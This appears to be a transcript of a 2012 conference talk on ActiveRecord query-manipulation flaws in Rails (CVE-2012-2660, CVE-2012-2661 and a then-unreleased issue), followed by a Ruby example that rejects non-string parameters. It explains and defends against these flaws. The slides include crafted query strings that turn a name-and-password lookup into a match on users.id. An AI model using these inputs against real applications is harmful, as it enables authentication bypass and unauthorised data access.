"Recent Rails SQL Issues" - 2012

Justin Collins

April 23, 2015
Transcript

  1. Rails Vulnerabilities
    Last Week
    CVE-2012-2660
    CVE-2012-2661

  2. CVE-2012-2660
    Allows unexpected “IS NULL” in queries
    Affects Rails 2.x and 3.x

  3. ActiveRecord Query
    unless params[:name].nil?
    @user = User.where(:name => params[:name])
    end

  4. Query Parameters
    ?name[]
    {"name"=>[nil]}

  5. ActiveRecord Query
    unless [nil].nil?
    @user = User.where(:name => [nil])
    end

  6. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661
    Allows some manipulation of WHERE clause
    via “dotted” query keys
    Affects Rails 3.x

  8. ActiveRecord Query
    User.where(:name => params[:name])

  9. ActiveRecord Query
    User.where("users.name" => params[:name])

  10. Query Parameters
    ?name[users.id]=1
    {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query
    User.where(:name => {"users.id" => "1"})

  12. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."id" = 1

  13. Unreleased Vulnerability
    Allows some manipulation of WHERE clause
    via nested hashes in query values
    Affects 2.3.x and 3.x

  14. ActiveRecord Query
    User.where(:name => params[:name],
    :password => params[:password])

  15. Query Parameters
    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query
    User.where(
      :name => {"users"=>{"id"=>"1"}},
      :password => {"users"=>{"id"=>"1"}})

  17. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
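All three issues on these slides have the same root: a query string is parsed into nested Arrays and Hashes, and those non-string values are handed straight to `where()`, which turns an Array into `IS NULL` and a Hash into conditions on a column the developer never named. The following Ruby is an added example, not code from the slides or from Rails: it re-implements just enough of the bracketed query-string parsing to reproduce the parameter hashes shown on slides 4, 10 and 15, and then shows the defensive check a controller would want, namely accepting only `String` values before building the conditions hash. `parse_nested_query`, `normalize_params`, `scalar_param`, `safe_conditions` and `check` are names chosen here; the sample query strings are the ones from the slides plus one benign request.

```ruby
require "uri"

# Added example, not code from the slides or from Rails itself.
# Two halves: a minimal re-implementation of the nested query-string
# parsing that produces the parameter hashes shown on the slides, and a
# type check that keeps those non-string values out of a hash passed to
# ActiveRecord's where(). The parser mimics Rack's bracket syntax only
# as far as these cases need (no arrays of hashes).

class UnexpectedParamType < ArgumentError; end

# Parse "?a[b][c]=1&d[]" into nested Hashes and Arrays. A pair without
# "=" yields a nil value, which is how "?name[]" becomes {"name"=>[nil]}.
def parse_nested_query(query_string)
  params = {}
  query_string.sub(/\A\?/, "").split("&").each do |pair|
    next if pair.empty?
    name, value = pair.split("=", 2)
    name  = URI.decode_www_form_component(name)
    value = URI.decode_www_form_component(value) if value
    normalize_params(params, name, value)
  end
  params
end

# Recursive helper: peel one bracketed segment off the name and descend.
def normalize_params(params, name, value)
  m = name.match(/\A\[?([^\[\]]+)\]?(.*)\z/)
  return params unless m
  key, rest = m[1], m[2]
  if rest.empty?
    params[key] = value
  elsif rest == "[]"
    (params[key] ||= []) << value
  else
    child = params[key].is_a?(Hash) ? params[key] : {}
    params[key] = normalize_params(child, rest, value)
  end
  params
end

# Return params[key] only when it is a String. Arrays (the [nil] case of
# CVE-2012-2660) and Hashes (the dotted and nested key cases of
# CVE-2012-2661 and the unreleased issue) raise instead of reaching SQL.
def scalar_param(params, key)
  value = params[key]
  return nil if value.nil?
  unless value.is_a?(String)
    raise UnexpectedParamType, "#{key} must be a String, got #{value.class}"
  end
  value
end

# Build the conditions hash for where() from validated scalars only;
# absent keys are dropped instead of becoming "IS NULL" predicates.
def safe_conditions(params, *keys)
  keys.each_with_object({}) do |key, conds|
    value = scalar_param(params, key)
    conds[key] = value unless value.nil?
  end
end

# Parse a query string and either return usable conditions or the
# reason the request was rejected.
def check(query_string)
  safe_conditions(parse_nested_query(query_string), "name", "password")
rescue UnexpectedParamType => e
  { rejected: e.message }
end

if __FILE__ == $0
  # Constructed inputs: the query strings from the slides plus a benign one.
  ["?name=alice&password=secret", "?name[]", "?name[users.id]=1",
   "?name[users][id]=1&password[users][id]=1"].each do |qs|
    puts "#{qs}  =>  #{parse_nested_query(qs).inspect}"
    puts "    conditions: #{check(qs).inspect}"
  end
end
```

Running the file prints each query string, the nested hash it parses to, and whether the request is accepted or rejected. The `scalar_param` check is the part that matters in an application: it sits between `params` and `where()`, so a missing key is simply dropped rather than matched as `IS NULL`, and any Array or Hash value is refused before ActiveRecord can interpret it as a column name or predicate.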